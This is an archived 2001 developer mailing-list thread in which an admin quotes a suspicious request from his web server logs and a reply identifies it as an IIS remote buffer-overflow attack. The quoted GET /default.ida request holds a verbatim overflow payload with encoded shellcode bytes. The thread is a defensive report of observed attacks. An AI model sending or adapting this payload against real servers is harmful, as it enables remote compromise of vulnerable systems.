[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-developers] Buffer overrun?

Subject: Re: [cobalt-developers] Buffer overrun?
From: shimi <shimi@xxxxxxxxxxxxxxxx>
Date: Thu Jul 19 06:33:14 2001
List-id: Discussion Forum for developers on Cobalt Networks products <cobalt-developers.list.cobalt.com>

On Thu, 19 Jul 2001, Admin @ Adopt A Band.com wrote:

> I have noticed today an explosion of hacking attempts on the http logs, the
> attackers (many different source IPs)
> are sending this string:
> 
> GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> 
> to which our RAQ4 answers (luckily) with a 400 not found ...
> But I guess that today there must have been some explot announced. Anybody
> knows anything about it? Reasons to be concerned?
> And, what would an .ida file be?
> 
> Alessandro Bologna

That's a Micro$oft IIS remote SYSTEM bug, found by www.eEye.com. Nothing
to worry about on Linux based machines.

- shimi.

Follow-Ups:
- Re: [cobalt-developers] Buffer overrun? [MORE]
  - From: shimi

References:
- [cobalt-developers] Buffer overrun?
  - From: Admin @ Adopt A Band.com

Prev by Date: [cobalt-developers] GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
Next by Date: Re: [cobalt-developers] GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
Previous by thread: [cobalt-developers] Buffer overrun?
Next by thread: Re: [cobalt-developers] Buffer overrun? [MORE]

Sun Cobalt Developers Message Index

Sun Cobalt Developers Thread Index